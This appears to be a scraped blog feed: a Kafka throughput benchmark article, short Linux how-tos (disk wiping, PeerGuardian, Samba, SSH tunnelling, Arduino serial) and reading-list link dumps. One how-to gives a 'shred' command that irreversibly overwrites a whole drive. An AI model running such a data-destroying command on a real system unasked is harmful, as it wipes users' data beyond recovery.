To actually make this work, though, this "universal log" has to be a cheap abstraction. If you want to use a system as a central data hub it has to be fast, predictable, and easy to scale so you can dump all your data onto it. My experience has been that systems that are fragile or expensive inevitably develop a wall of protective process to prevent people from using them; a system that scales easily often ends up as a key architectural building block just because using it is the easiest way to get things built.

I've always liked the benchmarks of Cassandra that show it doing a million writes per second on three hundred machines onEC2 and Google Compute Engine. I'm not sure why, maybe it is a Dr. Evil thing, but doing a million of anything per second is fun.

In any case, one of the nice things about a Kafka log is that, as we'll see, it is cheap. A million writes per second isn't a particularly big thing. This is because a log is a much simpler thing than a database or key-value store. Indeed our production clusters take tens of millions of reads and writes per second all day long and they do so on pretty modest hardware.

But let's do some benchmarking and take a look.

Kafka in 30 seconds

To help understand the benchmark, let me give a quick review of what Kafka is and a few details about how it works. Kafka is a distributed messaging system originally built at LinkedIn and now part of the Apache Software Foundation and used by a variety of companies.

The general setup is quite simple. Producers send records to the cluster which holds on to these records and hands them out to consumers:

The key abstraction in Kafka is the topic. Producers publish their records to a topic, and consumers subscribe to one or more topics. A Kafka topic is just a sharded write-ahead log. Producers append records to these logs and consumers subscribe to changes. Each record is a key/value pair. The key is used for assigning the record to a log partition (unless the publisher specifies the partition directly).

Here is a simple example of a single producer and consumer reading and writing from a two-partition topic.

This picture shows a producer process appending to the logs for the two partitions, and a consumer reading from the same logs. Each record in the log has an associated entry number that we call the offset. This offset is used by the consumer to describe it's position in each of the logs.

These partitions are spread across a cluster of machines, allowing a topic to hold more data than can fit on any one machine.

Note that unlike most messaging systems the log is always persistent. Messages are immediately written to the filesystem when they are received. Messages are not deleted when they are read but retained with some configurable SLA (say a few days or a week). This allows usage in situations where the consumer of data may need to reload data. It also makes it possible to support space-efficient publish-subscribe as there is a single shared log no matter how many consumers; in traditional messaging systems there is usually a queue per consumer, so adding a consumer doubles your data size. This makes Kafka a good fit for things outside the bounds of normal messaging systems such as acting as a pipeline for offline data systems such as Hadoop. These offline systems may load only at intervals as part of a periodic ETL cycle, or may go down for several hours for maintenance, during which time Kafka is able to buffer even TBs of unconsumed data if needed.

Kafka also replicates its logs over multiple servers for fault-tolerance. One important architectural aspect of our replication implementation, in contrast to other messaging systems, is that replication is not an exotic bolt-on that requires complex configuration, only to be used in very specialized cases. Instead replication is assumed to be the default: we treat un-replicated data as a special case where the replication factor happens to be one.

Producers get an acknowledgement back when they publish a message containing the record's offset. The first record published to a partition is given the offset 0, the second record 1, and so on in an ever-increasing sequence. Consumers consume data from a position specified by an offset, and they save their position in a log by committing periodically: saving this offset in case that consumer instance crashes and another instance needs to resume from it's position.

Okay, hopefully that all made sense (if not, you can read a more complete introduction to Kafka here).

This Benchmark

This test is against trunk, as I made some improvements to the performance tests for this benchmark. But nothing too substantial has changed since the last full release, so you should see similar results with 0.8.1. I am also using our newly re-written Java producer, which offers much improved throughput over the previous producer client.

I've followed the basic template of this very nice RabbitMQ benchmark, but I covered scenarios and options that were more relevant to Kafka.

One quick philosophical note on this benchmark. For benchmarks that are going to be publicly reported, I like to follow a style I call "lazy benchmarking". When you work on a system, you generally have the know-how to tune it to perfection for any particular use case. This leads to a kind of benchmarketing where you heavily tune your configuration to your benchmark or worse have a different tuning for each scenario you test. I think the real test of a system is not how it performs when perfectly tuned, but rather how it performs "off the shelf". This is particularly true for systems that run in a multi-tenant setup with dozens or hundreds of use cases where tuning for each use case would be not only impractical but impossible. As a result, I have pretty much stuck with default settings, both for the server and the clients. I will point out areas where I suspect the result could be improved with a little tuning, but I have tried to resist the temptation to do any fiddling myself to improve the results.

I have posted my exact configurations and commands, so it should be possible to replicate results on your own gear if you are interested.

The Setup

For these tests, I had six machines each has the following specs

  • Intel Xeon 2.5 GHz processor with six cores
  • Six 7200 RPM SATA drives
  • 32GB of RAM
  • 1Gb Ethernet

The Kafka cluster is set up on three of the machines. The six drives are directly mounted with no RAID (JBOD style). The remaining three machines I use for Zookeeper and for generating load.

A three machine cluster isn't very big, but since we will only be testing up to a replication factor of three, it is all we need. As should be obvious, we can always add more partitions and spread data onto more machines to scale our cluster horizontally.

This hardware is actually not LinkedIn's normal Kafka hardware. Our Kafka machines are more closely tuned to running Kafka, but are less in the spirit of "off-the-shelf" I was aiming for with these tests. Instead, I borrowed these from one of our Hadoop clusters, which runs on probably the cheapest gear of any of our persistent systems. Hadoop usage patterns are pretty similar to Kafka's, so this is a reasonable thing to do.

Okay, without further ado, the results!

Producer Throughput

These tests will stress the throughput of the producer. No consumers are run during these tests, so all messages are persisted but not read (we'll test cases with both producer and consumer in a bit). Since we have recently rewritten our producer, I am testing this new code.

Single producer thread, no replication

821,557 records/sec
(78.3 MB/sec)

For this first test I create a topic with six partitions and no replication. Then I produce 50 million small (100 byte) records as quickly as possible from a single thread.

The reason for focusing on small records in these tests is that it is the harder case for a messaging system (generally). It is easy to get good throughput in MB/sec if the messages are large, but much harder to get good throughput when the messages are small, as the overhead of processing each message dominates.

Throughout this benchmark, when I am reporting MB/sec, I am reporting just the value size of the record times the request per second, none of the other overhead of the request is included. So the actually network usage is higher than what is reported. For example with a 100 byte message we would also transmit about 22 bytes of overhead per message (for an optional key, size delimiting, a message CRC, the record offset, and attributes flag), as well as some overhead for the request (including the topic, partition, required acknowledgements, etc). This makes it a little harder to see where we hit the limits of the NIC, but this seems a little more reasonable then including our own overhead bytes in throughput numbers. So, in the above result, we are likely saturating the 1 gigabit NIC on the client machine.

One immediate observation is that the raw numbers here are much higher than people expect, especially for a persistent storage system. If you are used to random-access data systems, like a database or key-value store, you will generally expect maximum throughput around 5,000 to 50,000 queries-per-second, as this is close to the speed that a good RPC layer can do remote requests. We exceed this due to two key design principles:

  1. We work hard to ensure we do linear disk I/O. The six cheap disks these servers have gives an aggregate throughput of 822 MB/sec of linear disk I/O. This is actually well beyond what we can make use of with only a 1 gigabit network card. Many messaging systems treat persistence as an expensive add-on that decimates performance and should be used only sparingly, but this is because they are not able to do linear I/O.
  2. At each stage we work on batching together small bits of data into larger network and disk I/O operations. For example, in the new producer we use a "group commit"-like mechanism to ensure that any record sends initiated while another I/O is in progress get grouped together. For more on understanding the importance of batching, check out this presentation by David Patterson on why "Latency Lags Bandwidth".

If you are interested in the details you can read a little more about this in our design documents.

Single producer thread, 3x asynchronous replication

786,980 records/sec
(75.1 MB/sec)

This test is exactly the same as the previous one except that now each partition has three replicas (so the total data written to network or disk is three times higher). Each server is doing both writes from the producer for the partitions for which it is a master, as well as fetching and writing data for the partitions for which it is a follower.

Replication in this test is asynchronous. That is, the server acknowledges the write as soon as it has written it to its local log without waiting for the other replicas to also acknowledge it. This means, if the master were to crash, it would likely lose the last few messages that had been written but not yet replicated. This makes the message acknowledgement latency a little better at the cost of some risk in the case of server failure.

The key take away I would like people to have from this is that replication can be fast. The total cluster write capacity is, of course, 3x less with 3x replication (since each write is done three times), but the throughput is still quite good per client. High performance replication comes in large part from the efficiency of our consumer (the replicas are really nothing more than a specialized consumer) which I will discuss in the consumer section.

Single producer thread, 3x synchronous replication

421,823 records/sec
(40.2 MB/sec)

This test is the same as above except that now the master for a partition waits for acknowledgement from the full set of in-sync replicas before acknowledging back to the producer. In this mode, we guarantee that messages will not be lost as long as one in-sync replica remains.

Synchronous replication in Kafka is not fundamentally very different from asynchronous replication. The leader for a partition always tracks the progress of the follower replicas to monitor their liveness, and we never give out messages to consumers until they are fully acknowledged by replicas. With synchronous replication we just wait to respond to the producer request until the followers have replicated it.

This additional latency does seem to affect our throughput. Since the code path on the server is very similar, we could probably ameliorate this impact by tuning the batching to be a bit more aggressive and allowing the client to buffer more outstanding requests. However, in spirit of avoiding special case tuning, I have avoided this.

Three producers, 3x async replication

2,024,032 records/sec
(193.0 MB/sec)

Our single producer process is clearly not stressing our three node cluster. To add a little more load, I'll now repeat the previous async replication test, but now use three producer load generators running on three different machines (running more processes on the same machine won't help as we are saturating the NIC). Then we can look at the aggregate throughput across these three producers to get a better feel for the cluster's aggregate capacity.

Producer Throughput Versus Stored Data

One of the hidden dangers of many messaging systems is that they work well only as long as the data they retain fits in memory. Their throughput falls by an order of magnitude (or more) when data backs up and isn't consumed (and hence needs to be stored on disk). This means things may be running fine as long as your consumers keep up and the queue is empty, but as soon as they lag, the whole messaging layer backs up with unconsumed data. The backup causes data to go to disk which in turns causes performance to drop to a rate that means messaging system can no longer keep up with incoming data and either backs up or falls over. This is pretty terrible, as in many cases the whole purpose of the queue was to handle such a case gracefully.

Since Kafka always persists messages the performance is O(1) with respect to unconsumed data volume.

To test this experimentally, let's run our throughput test over an extended period of time and graph the results as the stored dataset grows:

This graph actually does show some variance in performance, but no impact due to data size: we perform just as well after writing a TB of data, as we do for the first few hundred MBs.

The variance seems to be due to Linux's I/O management facilities that batch data and then flush it periodically. This is something we have tuned for a little better on our production Kafka setup. Some notes on tuning I/O are available here.

Consumer Throughput

Okay now let's turn our attention to consumer throughput.

Note that the replication factor will not effect the outcome of this test as the consumer only reads from one replica regardless of the replication factor. Likewise, the acknowledgement level of the producer also doesn't matter as the consumer only ever reads fully acknowledged messages, (even if the producer doesn't wait for full acknowledgement). This is to ensure that any message the consumer sees will always be present after a leadership handoff (if the current leader fails).

Single Consumer

940,521 records/sec
(89.7 MB/sec)

For the first test, we will consume 50 million messages in a single thread from our 6 partition 3x replicated topic.

Kafka's consumer is very efficient. It works by fetching chunks of log directly from the filesystem. It uses the sendfile API to transfer this directly through the operating system without the overhead of copying this data through the application. This test actually starts at the beginning of the log, so it is doing real read I/O. In a production setting, though, the consumer reads almost exclusively out of the OS pagecache, since it is reading data that was just written by some producer (so it is still cached). In fact, if you run I/O stat on a production server you actually see that there are no physical reads at all even though a great deal of data is being consumed.

Making consumers cheap is important for what we want Kafka to do. For one thing, the replicas are themselves consumers, so making the consumer cheap makes replication cheap. In addition, this makes handling out data an inexpensive operation, and hence not something we need to tightly control for scalability reasons.

Three Consumers

2,615,968 records/sec
(249.5 MB/sec)

Let's repeat the same test, but run three parallel consumer processes, each on a different machine, and all consuming the same topic.

As expected, we see near linear scaling (not surprising because consumption in our model is so simple).

Producer and Consumer

795,064 records/sec
(75.8 MB/sec)

The above tests covered just the producer and the consumer running in isolation. Now let's do the natural thing and run them together. Actually, we have technically already been doing this, since our replication works by having the servers themselves act as consumers.

All the same, let's run the test. For this test we'll run one producer and one consumer on a six partition 3x replicated topic that begins empty. The producer is again using async replication. The throughput reported is the consumer throughput (which is, obviously, an upper bound on the producer throughput).

As we would expect, the results we get are basically the same as we saw in the producer only case—the consumer is fairly cheap.

Effect of Message Size

I have mostly shown performance on small 100 byte messages. Smaller messages are the harder problem for a messaging system as they magnify the overhead of the bookkeeping the system does. We can show this by just graphing throughput in both records/second and MB/second as we vary the record size.

So, as we would expect, this graph shows that the raw count of records we can send per second decreases as the records get bigger. But if we look at MB/second, we see that the total byte throughput of real user data increases as messages get bigger:

We can see that with the 10 byte messages we are actually CPU bound by just acquiring the lock and enqueuing the message for sending—we are not able to actually max out the network. However, starting with 100 bytes, we are actually seeing network saturation (though the MB/sec continues to increase as our fixed-size bookkeeping bytes become an increasingly small percentage of the total bytes sent).

End-to-end Latency

2 ms (median)
3 ms (99th percentile)
14 ms (99.9th percentile)

We have talked a lot about throughput, but what is the latency of message delivery? That is, how long does it take a message we send to be delivered to the consumer? For this test, we will create producer and consumer and repeatedly time how long it takes for a producer to send a message to the kafka cluster and then be received by our consumer.

Note that, Kafka only gives out messages to consumers when they are acknowledged by the full in-sync set of replicas. So this test will give the same results regardless of whether we use sync or async replication, as that setting only affects the acknowledgement to the producer.

Replicating this test

If you want to try out these benchmarks on your own machines, you can. As I said, I mostly just used our pre-packaged performance testing tools that ship with Kafka and mostly stuck with the default configs both for the server and for the clients. However, you can see more details of the configuration and commands here.

SIMONE 2016-05-26 13:53 发表评论

          Quick Wipe of Hard Drive using Linux        
This is what I have found to be the quickest way to wipe a hard drive under Linux (you can use an Ubuntu Live CD to do this).

sudo shred -v -z -n 1 /dev/sda

(where 'sda' is whatever your drive is - sda, sdb, sdc etc)

The parameters used in the above example are: -

  • -v = verbose (show progress)
  • -z = add a final overwrite with zeros
  • -n 1 = Overwrite 1 time (instead of the default of 25)

This should overwrite any sensitive data on the disk once followed by zeros. Modern hard drives shouldn't need more than one pass overwrite anyway according to this article.

This method is by far the fastest that I have found - some of the other methods were estimated to take 3 days to complete on a 250GB hard drive, this way only took an hour or two.

          Installing Peerguardian Linux on Ubuntu 10.10        
Here are some quick notes on how to install pgl under Ubuntu 10.10.

1. Add the gpg key to the apt keyring

gpg --keyserver keyserver.ubuntu.com --recv 9C0042C8
gpg --export --armor 9C0042C8 | sudo apt-key add -

2. Add the repository sources to your /etc/apt/sources.list

vi /etc/apt/sources.list

deb http://ppa.launchpad.net/jre-phoenix/ppa/ubuntu maverick main
deb-src http://ppa.launchpad.net/jre-phoenix/ppa/ubuntu maverick main

3. Update packages & install pgl

sudo apt-get update
sudo apt-get install pgld pglcmd
(Answer the questions during installation process.)

4. To check status: -

sudo pglcmd status

          Checking video codec information via the command-line        
Here are a couple of commands to get he information about a video file in Linux (bitrate etc): -

 ffmpeg -i foo.avi 
 mplayer -vo null -ao null -identify -frames 0 foo.avi 

          Connecting an Arduino to a Seagate Dockstar        
Here's a quick summary of how to connect your arduino to a Seagate Dockstar.

Checking connection

1. Install Plugbox Linux on the Dockstar (via http://plugapps.com/index.php5?title=PlugApps:Pogoplug_Setboot )

2. Plug in arduino to Dockstar via USB cable

3. Check arduino recognised

[root@Plugbox ~]# dmesg
The bottom lines should look something like: -

[ 126.200168] usb 1-1.3: new full speed USB device using orion-ehci and address 4
[ 126.382290] usbcore: registered new interface driver usbserial
[ 126.382974] USB Serial support registered for generic
[ 126.383709] usbcore: registered new interface driver usbserial_generic
[ 126.383722] usbserial: USB Serial Driver core
[ 126.401088] USB Serial support registered for FTDI USB Serial Device
[ 126.401283] ftdi_sio 1-1.3:1.0: FTDI USB Serial Device converter detected
[ 126.401569] usb 1-1.3: Detected FT232RL
[ 126.401582] usb 1-1.3: Number of endpoints 2
[ 126.401592] usb 1-1.3: Endpoint 1 MaxPacketSize 64
[ 126.401601] usb 1-1.3: Endpoint 2 MaxPacketSize 64
[ 126.401610] usb 1-1.3: Setting MaxPacketSize 64
[ 126.402330] usb 1-1.3: FTDI USB Serial Device converter now attached to ttyUSB0
[ 126.403067] usbcore: registered new interface driver ftdi_sio
[ 126.403080] ftdi_sio: v1.6.0:USB FTDI Serial Converters Driver

4. Check which device to use

[root@Plugbox ~]# ls -ltr /dev/ttyU*
crw-rw---- 1 root uucp 188, 0 Oct 29 13:17 /dev/ttyUSB0

Communication via Command Line

1. Configure serial port (taken from http://www.arduino.cc/playground/Interfacing/LinuxTTY)

[root@Plugbox ~]# stty -F /dev/ttyUSB0 cs8 19200 ignbrk -brkint -icrnl -imaxbel -opost -onlcr -isig -icanon -iexten -echo -echoe -echok -echoctl -echoke noflsh -ixon -crtscts
(19200 should match the baud rate set via Serial.begin(XXXX) in the arduino program)

2. Read data from arduino: -

[root@Plugbox ~]# cat /dev/ttyUSB0
3. Send data to arduino: -

[root@Plugbox ~]# echo "Hello Arduino" > /dev/ttyUSB0

Communication via Minicom

1. Install minicom

[root@Plugbox ~]# pacman -Sy minicom
2. Fire up minicom

[root@Plugbox ~]# minicom -D /dev/ttyUSB0 -b 19200
          Windows 7 and Samba Shares        
This is a quick guide to setting up Samba file sharing on my Viglen MPC-L server which is running Ubuntu 8.04.3 LTS. The client is a Windows 7 machine – no changes to the registry or local security policy were needed. The following applies to the version of samba from the repositories -   smbd version 3.0.28a.

1. Install Samba

sudo apt-get install samba smbfs

2. Edit Samba Configuration File

Find the line which is commented out - “;   security=user” and change it to: -
security = user

username map = /etc/samba/smbusers

Find the line “encrypt passwords = no” and change it to “encrypt passwords = true”

Add a section for each share that you want to be available: -

browseable = yes

comment = Data

path = /data

force user = viglen

force group = users

read only = No

guest ok = Yes

3. Add “smbusers” file

A new file is now needed to map smb users onto local linux users. Create the file: -
sudo vi /etc/samba/smbusers

and add the following to it: -
viglen = "viglen"

4. Change  SMB Password for user

Set a password for the viglen smb user by running the following command: -
sudo smbpasswd viglen

5. Restart Samba

sudo /etc/init.d/samba restart

6. Test Connection from Windows

Open a windows command prompt (Start -> cmd) and enter the following command (with the correct IP address and password)
net use q: \\aaa.bbb.ccc.ddd\data password /user:viglen

You should get a message “The command completed successfully.”, and Q: should be accessible through Windows Explorer etc.

To remove the share, enter the following command: -
net use /d q:

          Install new HD in G5        
I'm new to mac, mostly use Linux. I got this nice G5 with everything including manuals and 2 OE disks. One has 10.4 and the other 9.2 I...
          Created Unassigned: Memory segment is unavailable [17737]        
I have cosmos user kit installed with visual studio 2010.I created my OS and created an ISO image for it. However, The following popped up:

ISOLINUX 4.05 2011-12-9 ETCD copyright (C) 1994-2011 H. Peter Anvin et al
Loading cosmos.bin... ok
Memory segment at 0x02000000 (len 0x0009ecf4) is unavailable.

when I typed mboot.c32, it showed settings
when I typed cosmos.bin, this appeared:
![Image](https://drive.google.com/drive/folders/0B5l998B7V_NmRnRJNFR2c3NkV00?usp=sharing/cosmos.bin run.png)

Please Help!
P.S. This may not have anything to do with you, but it is a cosmos problem. I used VirtualBox to run the ISO image.

          Ruby is Gentoo, Python is Ubuntu        

I used to be a Gentoo guy. For like 7 years I ran it and it was my world. It was more of a religion than a Linux distro. But perhaps that’s implied. Anyway, I eventually ended up back at Ubuntu. I also used to be a Python guy, but I eventually ended up on Ruby. I feel...


I do a weekly show called Unsupervised Learning, where I curate the most interesting stories in infosec, technology, and humans, and talk about why they matter. You can subscribe here.

          How to Connect to a Local Port on a Remote SSH Server        

If you ever have a web server (or other type of server) running on a remote Linux box, and you want to connect to it using your local system, here’s how you do it. ssh -i ./.ssh/key.pem -N -L 8081:localhost:8000 user@host This reads as: Authenticate using a key. The port you’re listening on on your local system is...


I do a weekly show called Unsupervised Learning, where I curate the most interesting stories in infosec, technology, and humans, and talk about why they matter. You can subscribe here.

          More Spring reading        

Hi folks, here's a nice, juicy reading list for that rainy Saturday afternoon. Well... it has stopped raining here but that should not stop you from reading!


Slightly more hard core Java

Java in the future

A little bit of non-Java


Systems, data stores and more

Time series

Some fun stuff

Until next time! Ashwin.

          Spring 2017 tech reading        
Hello and a belated happy new year to you! Here's another big list of articles I thought was worth sharing. As always thanks to the authors who wrote these articles and to the people who shared them on Twitter/HackerNews/etc.

Distributed systems (and even plain systems)


SQL lateral view

Docker and containers

Science and math


Java streams and reactive systems

Java Lambdas

Just Java

General and/or fun

Until next time!

          Fall 2016 tech reading        
It's almost the end of the year, so here's another big list to go through while you wait at the airport on your way to your vacation.


Streaming JSON and JAX-RS streaming

Java Strings

Data - Small and Big

Channels and Actors



Misc Science/Tech

Misc - Fun, Tidbits

Happy holidays!

          Summer 2016 tech reading        

Hi there! Summer is here and almost gone. So here's a gigantic list of my favorite, recent articles, which I should've shared sooner.


Other languages

Reactive programming

Persistent data structures



Systems and other computer science-y stuff


Until next time! Ashwin.

          Fall 2015 tech reading        
Big systems:
Until next time!
          Summer 2015 tech reading and goodies        
Graph and other stores:
  • http://www.slideshare.net/HBaseCon/use-cases-session-5
  • http://www.datastax.com/dev/blog/tales-from-the-tinkerpop
  • TAO: Facebook's Distributed Data Store for the Social Graph
    Architecture & Implementation
    All of the data for objects and associations is stored in MySQL. A non-SQL store could also have been used, but when looking at the bigger picture SQL still has many advantages:
    …it is important to consider the data accesses that don’t use the API. These include back-ups, bulk import and deletion of data, bulk migrations from one data format to another, replica creation, asynchronous replication, consistency monitoring tools, and operational debugging. An alternate store would also have to provide atomic write transactions, efficient granular writes, and few latency outliers
  • Twitter Heron: Stream Processing at Scale
    Storm has no backpressure mechanism. If the receiver component is unable to handle incoming data/tuples, then the sender simply drops tuples. This is a fail-fast mechanism, and a simple strategy, but it has the following disadvantages:
    Second, as mentioned in [20], Storm uses Zookeeper extensively to manage heartbeats from the workers and the supervisors. use of Zookeeper limits the number of workers per topology, and the total number of topologies in a cluster, as at very large numbers, Zookeeper becomes the bottleneck.
    Hence in Storm, each tuple has to pass through four threads from the point of entry to the point of exit inside the worker proces2. This design leads to significant overhead and queue contention issues.
    Furthermore, each worker can run disparate tasks. For example, a Kafka spout, a bolt that joins the incoming tuples with a Twitter internal service, and another bolt writing output to a key-value store might be running in the same JVM. In such scenarios, it is difficult to reason about the behavior and the performance of a particular task, since it is not possible to isolate its resource usage. As a result, the favored troubleshooting mechanism is to restart the topology. After restart, it is perfectly possible that the misbehaving task could be scheduled with some other task(s), thereby making it hard to track down the root cause of the original problem.
    Since logs from multiple tasks are written into a single file, it is hard to identify any errors or exceptions that are associated with a particular task. The situation gets worse quickly if some tasks log a larger amount of information compared to other tasks. Furthermore, an unhandled exception in a single task takes down the entire worker process, thereby killing other (perfectly fine) running tasks. Thus, errors in one part of the topology can indirectly impact the performance of other parts of the topology, leading to high variance in the overall performance. In addition, disparate tasks make garbage collection related-issues extremely hard to track down in practice.
    For resource allocation purposes, Storm assumes that every worker is homogenous. This architectural assumption results in inefficient utilization of allocated resources, and often results in over-provisioning. For example, consider scheduling 3 spouts and 1 bolt on 2 workers. Assuming that the bolt and the spout tasks each need 10GB and 5GB of memory respectively, this topology needs to reserve a total of 15GB memory per worker since one of the worker has to run a bolt and a spout task. This allocation policy leads to a total of 30GB of memory for the topology, while only 25GB of memory is actually required; thus, wasting 5GB of memory resource. This problem gets worse with increasing number of diverse components being packed into a worker
    A tuple failure anywhere in the tuple tree leads to failure of the entire tuple tree . This effect is more pronounced with high fan-out topologies where the topology is not doing any useful work, but is simply replaying the tuples.
    The next option was to consider using another existing open- source solution, such as Apache Samza [2] or Spark Streaming [18]. However, there are a number of issues with respect to making these systems work in its current form at our scale. In addition, these systems are not compatible with Storm’s API. Rewriting the existing topologies with a different API would have been time consuming resulting in a very long migration process. Also note that there are different libraries that have been developed on top of the Storm API, such as Summingbird [8], and if we changed the underlying API of the streaming platform, we would have to change other components in our stack.
Until next time!

          A simple guide to using Unix/GNU Linux command line tools for fiddling with log files (*runs on Windows too)        
I've been meaning to write this post for years now. Every time I thought about compiling a basic list, I've told my self "Nah.. there must be tons of examples on the net". Yes there are tons of them but I couldn't find anything:
  • That helped absolute noobs with a consolidated list
  • That demonstrated actual fiddling with Java log files
  • Something that works on Windows(!) No, I don't mean the awful Cygwin tool but something like Busybox or the wonderful Gow
So, here it is:
          Starting 2015 with yet another link dump        
A belated happy new year! Here's some reading material I've been accumulating for a few months.

Distributed systems: